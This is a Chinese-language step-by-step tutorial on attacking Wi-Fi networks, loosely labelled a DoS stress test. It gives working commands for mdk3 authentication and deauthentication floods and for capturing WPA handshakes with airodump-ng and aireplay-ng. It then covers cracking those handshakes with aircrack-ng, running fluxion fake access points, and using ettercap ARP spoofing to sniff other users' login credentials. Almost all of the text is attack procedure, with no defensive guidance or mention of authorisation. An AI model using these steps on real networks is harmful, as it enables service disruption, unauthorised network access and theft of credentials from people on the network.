DOS攻擊壓力測試
攻擊者發送和偽造大量數據包至AP進行攻擊,將導致AP無法提供正常的服務或資源訪問。在無線網絡的環境下,常見的幾種DOS攻擊:
Authentication Flood
Deauthentication Flood
Disassociation Flood
RF Jamming
Association Flood等
用mdk3實現dos攻擊:
掛載無線網卡,激活網卡為監聽模式
airmon-ng start wlan0

掃描附近的無線信號
airodump-ng mon0

1、身份驗證攻擊(Authentication Flood)
這是一種驗證請求攻擊模式:在這個模式里,軟件自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙于處理過多的請求而停止對正常連接客戶端的響應操作:
mdk3 mon0 a -a MAC

2、偽造斷開連接(Deauthentication Flood)
在這個模式下,軟件會向周圍所有可見AP不斷發出“斷開連接”的包,可以造成一定范圍內的無線網絡癱瘓(當然有白名單,黑名單模式),直到手動停止攻擊!-C 后面跟的是信道。
mdk3 mon0 d -c 11
可以利用-s參數來加快發包速率,另外可以使用-w(白名單) –b(黑名單)來添加mac地址,這樣我們就可以使自己偽造的AP永遠的不受自己的攻擊所影響,而黑白名單可以寫單獨的一個mac也可以寫文件的絕對路徑,然后把要加入名單的mac寫在文件里。
密碼破解
抓取握手包破解WiFi密碼
1、aircrack暴力破解無線密碼
掛載無線網卡,激活網卡為監聽模式
airmon-ng start wlan0
掃描附近的無線信號,主要是找對應的信道
airodump-ng mon0
監聽某信道WiFi并保存報文
airodump-ng -c 11 -w /root/baowen mon0
使目標斷線重連抓取握手包(例如進行10次dos攻擊是終端斷線重連抓包)
aireplay-ng -0 10 -a wifi的mac地址 -c 客戶端mac地址 mon0

抓到握手包后即可ctrl+c 結束,開始破解
aircrack-ng -w 字典目錄 報文目錄
eg: aircrack-ng -w ./pass/wifipass.txt ./baowen/123-01.cap

2、使用自動化工具fluxion進行密碼破解和AP欺騙
Fluxion 可進行暴力破解和偽造AP攻擊獲取無線信息
運行fluxion,選擇語言、信道

確認后會運行airodump-ng掃描無線熱點

出現目標ssid后Ctrl+C結束,會顯示掃描的熱點信息

選擇對應的熱點,執行后執行dos攻擊斷開目標連接進而抓取握手包

可直接保存抓取的握手包進行暴力破解,同時也可選擇偽造AP進行欺騙

嗅探、中間人攻擊
攻擊者處于無線局域網中,若網絡未作端口隔離,可利用ARP欺騙等手段,對同網段用戶,進行中間人攻擊,并分析獲取用戶信息。可能導致無線數據篡改使得WLAN業務系統正常訪問數據被非法竊取、篡改和破壞。
使用ettercap工具嗅探用戶數據
首先啟用路由轉發
echo 1 >> /proc/sys/net/ipv4/ip_forward
使用ARP欺騙,利用ettercap實現中間人攻擊
指定網卡,Unified sniffing 選擇eth0

掃描主機scan for hosts

查看hosts list

此處選擇要欺騙的主機,點擊Add to target 1,選擇網關Add to target 2

選擇菜單Mitm,勾選Sniff remote connections

開始欺騙嗅探

通過菜單欄View -> connection可以查看嗅探的數據(登錄用戶名密碼信息)
